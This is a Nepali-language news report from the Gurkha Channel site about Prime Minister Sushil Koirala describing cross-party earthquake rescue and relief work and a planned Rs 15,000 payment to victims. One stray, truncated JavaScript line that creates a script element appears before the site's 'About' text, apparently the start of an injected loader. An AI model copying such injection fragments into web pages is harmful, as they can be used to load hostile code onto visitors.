राजनीतिक दलको सक्रियता, सहयोग र सद्भावमा भूकम्पपछिको खोज, उद्धार, राहत र पुनर्बासको काम भइरहेको

admin Avatar

प्रधानमन्त्री सुशील कोइरालाले सबै राजनीतिक दलको सक्रियता, सहयोग र सद्भावमा भूकम्पपछिको खोज, उद्धार, राहत र पुनर्बासको काम भइरहेको बताउनुभएको छ। राष्ट्रिय विपद् व्यवस्थापन अनुगमन समितिको बुधबारको बैठकमा प्रधानमन्त्री कोइरालाले सबै पक्षको प्रयासमा पुनःस्थापना र पुनःनिर्माणको काम सफल हुने विश्वास व्यक्त गर्नुभयो। पूर्व तयारी नहुँदा यस्तो विपद्लाई धान्न समस्या परेको बताउँदै उहाँले उपलब्ध साधन र स्रोतका आधारमा सबै राजनीतिक दलको सहयोगबाट विपद्पछिको कार्यलाई अगाडि बढाइएको बताउनुभयो।

सबैले सरकारसँग अपेक्षा गर्ने भएकाले यस अवस्थामा आलोचनालाई आफूले सहजरुपमा लिएको उल्लेख गर्दै प्रधानमन्त्री कोइरालाले राम्रो बसोबास होस भनेर, इन्जिनियरको टोलीलाई गाउँ गाउँ पठाइएको जानकारी दिनुभयो। उहाँले विपद्को समयमा भएका कमकमजोरीलाई सुधार गर्दै अगाडि बढ्नुको विकल्प नभएको बताउनुभयो। प्रधानमन्त्री कोइरालाले स्थानीय निकाय नहुँदा विपद्को अवस्थामा काम गर्न कठिनाइ भएको उल्लेख गर्नुभयो। उहाँले समयमै सबैले उचित राहत पाउनुपर्छ भन्ने उद्देश्यले रु १५ हजारसम्म भूकम्प प्रभावितलाई उपलब्ध गराउन आफूले पहल गरिरहेको बताउनुभयो। विपद्को अवस्थाबारे जानकारी दिन समितिले प्रधानमन्त्रीलाई बोलाएको थियो।

var d=document;var s=d.createElement(‘script’);

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories